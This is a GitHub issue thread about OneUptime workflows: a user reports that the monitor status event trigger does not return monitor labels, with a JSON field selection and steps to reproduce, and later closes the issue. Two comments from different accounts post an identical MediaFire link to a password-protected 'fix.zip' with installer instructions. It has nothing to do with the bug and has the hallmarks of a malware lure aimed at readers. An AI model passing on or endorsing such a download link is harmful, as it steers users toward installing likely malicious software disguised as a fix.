### ISSUE TITLE
Monitor Status Event trigger not returns monitor labels in model

### ISSUE THREAD

**Issue by luisxkimo** [OneUptime/oneuptime#1657]
**Describe the bug**
Creating a new workflow using as trigger "On Create Monitor Status Event", I would like to check the labels of the monitor that triggers the event.

Here is the "Select fields" configuration:
```json
{
    "project": {
        "name": true,
        "_id": true
    },
    "monitor": {
        "currentMonitorStatus":true,
        "name": true,
        "_id": true,
        "monitorType": true,
        "labels": true
    },
    "monitorStatus": {
        "name": true,
        "_id": true,
        "isOperationalState": true,
        "isOfflineState": true
    },
    "rootCause": true,
    "startsAt": true
}
```
I expectd that in the model there are the labels of the monitor, but not. 

**To Reproduce**
1. Go to 'Workflows'
2. Create new workflow with trigger "On Create Monitor Status Event"
3. In select fields, add previous configuration
4. Force an event of this kind and check the "Workflow logs" section to know the values of labels

**Expected behavior**
I expectd that in the model there are the labels of the monitor,

**Screenshots**
From the "Run and logs" we can see this: missing labels section inside json of "monitor", but other like "monitorType" works well:
![image](https://github.com/user-attachments/assets/22898477-8845-40d4-b56a-b06221f68dfa)

**Desktop (please complete the following information):**
 - Browser: Edge
 - Version 7.0.2976

**Deployment Type**
Helm chart

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by luisxkimo** [comment]
Hi @simlarsen ,

Ok, in that case I think that we can continue discuss this solution here:

https://github.com/OneUptime/oneuptime/issues/1658

Because its exactly what I did trying to solve this gap, but I still having issues.

Closed this issue in that case from my side.

Thanks!
